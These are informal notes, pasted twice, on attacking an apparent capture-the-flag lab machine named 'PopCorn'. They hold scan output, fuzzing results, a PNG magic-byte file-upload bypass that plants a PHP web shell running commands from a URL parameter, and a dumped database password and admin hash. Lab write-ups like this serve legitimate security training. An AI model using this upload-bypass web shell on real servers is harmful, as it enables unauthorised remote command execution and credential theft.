Machine - PopCorn - Linux - Medium
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
| http-enum:
| /test/: Test page
| /test.php: Test page
| /test/logon.html: Jetty
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.2.12 (Ubuntu)
- php5.2.10
- ubuntu 6.10
- test folder always shows a phpinfo
- fuzzing for .txt or .php
000004023: 301 9 L 28 W 310 Ch "torrent"
000011416: 301 9 L 28 W 309 Ch "rename"
- in the torrent
- we could upload a torrent
- let’s try to modify the torrent to add a cmd …
- no way :(
- there is a way to upload a png
- I could upload the png, but I saw no way of executing
- let’s see if I can move it with the rename endpoiint
- yey! we got our magic php shell :)
echo -n -e '\x89\x50\x4E\x47'
echo '<?php system($_GET["cmd"]); ?>' >> img.php.png
from www-data to george or root
- enumeration
- mysql local
- pspy
- nothing interesting
- sudo -l → nothing
- there is a source code of the torrenthoster
- lets upload to my pc
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password
| 3 | Admin | d5bfedcee289e5e05b86daad8ee3e2e2 | admin | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |
let’s try to crack the md5 hash no luck :(
- abandon!
Machine - PopCorn - Linux - Medium
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
| http-enum:
| /test/: Test page
| /test.php: Test page
| /test/logon.html: Jetty
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.2.12 (Ubuntu)
- php5.2.10
- ubuntu 6.10
- test folder always shows a phpinfo
- fuzzing for .txt or .php
000004023: 301 9 L 28 W 310 Ch "torrent"
000011416: 301 9 L 28 W 309 Ch "rename"
- in the torrent
- we could upload a torrent
- let’s try to modify the torrent to add a cmd …
- no way :(
- there is a way to upload a png
- I could upload the png, but I saw no way of executing
- let’s see if I can move it with the rename endpoiint
- yey! we got our magic php shell :)
echo -n -e '\x89\x50\x4E\x47'
echo '<?php system($_GET["cmd"]); ?>' >> img.php.png
from www-data to george or root
- enumeration
- mysql local
- pspy
- nothing interesting
- sudo -l → nothing
- there is a source code of the torrenthoster
- lets upload to my pc
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password
| 3 | Admin | d5bfedcee289e5e05b86daad8ee3e2e2 | admin | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |
let’s try to crack the md5 hash no luck :(
- abandon!